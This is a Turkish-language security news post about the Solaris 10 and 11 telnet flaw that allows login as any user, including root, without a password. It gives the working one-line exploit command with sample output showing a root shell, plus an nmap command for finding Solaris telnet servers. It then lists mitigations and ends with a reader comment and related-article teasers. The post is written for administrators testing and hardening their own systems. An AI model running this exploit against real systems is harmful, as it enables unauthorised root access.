Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Hotmail ve Yahoomail virus tehdidi altında

conan

Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.

Akustik Şifre Analizi: Mikroişlemcinizin Çıkardığı Sesler ve Potansiyel Saldırı

FZ

Bilgisayarınızın kalbini dinlemeyi denediniz mi? Acaba GnuPG ile bir şeyleri şifrelerken çıkan ``sesler´´ olası bir saldırgana bazı ipuçları verir mi? Mikroişlemciyi dinlemek mi!? O da ne! diyenlerden misiniz?

O halde Adi Shamir ve Eran Tromer´in Acoustic Cryptanalysis başlıklı bu ilginç çalışması ufkunuzu genişletebilir.

Paranoyaklar için THL

FZ

Güvenlik konusunda hassas bir insan olabilirsiniz. Kullandığınız bilgisayarın klavyesinde bastığınız tuşların bir yazılım ya da donanım tarafından bir yerlere kaydedildiğini düşünüyor olabilirsiniz (key logging). PGP anahtarlarınızın çalınacağından korkuyor olabilirsiniz. Ya da birilerinin TEMPEST yöntemi ile sistemi gözetlediğinden şüpheleniyor olabilirsiniz.

Yani kısaca paranoyak olabilirsiniz ve o zaman Tinfoil Hat Linux ilginizi çekebilir.

Not: Biraz fazla popüler olan bu yazılımın web sitesi eğer sizi hayal kırıklığına uğrattı ise bana küfretmeden önce sistemin yazarının iddia ettiği gibi birkaç hafta bekleyin, olmazsa şikayetlerinizi gene yukarıda bahsi geçen kişiye iletin ;-)

Pasaportumda casus çip mi var?

towsonu2003

Yakında pasaport başvurusunda mı bulunmayı düşünüyorsunuz?

Radikal'in geçtiği habere göre 2007'nin başlarından itibaren yeni pasaportunuzda, daha önce beklenildiği üzere, içinde kişisel bilgilerinizin bulunduğu bir RFID (Radyo Frekansı ile Tanımlama) çipi olacak. Ama bu çipe eklenecek bilgiler hakkında detaylar henüz bilinmiyor.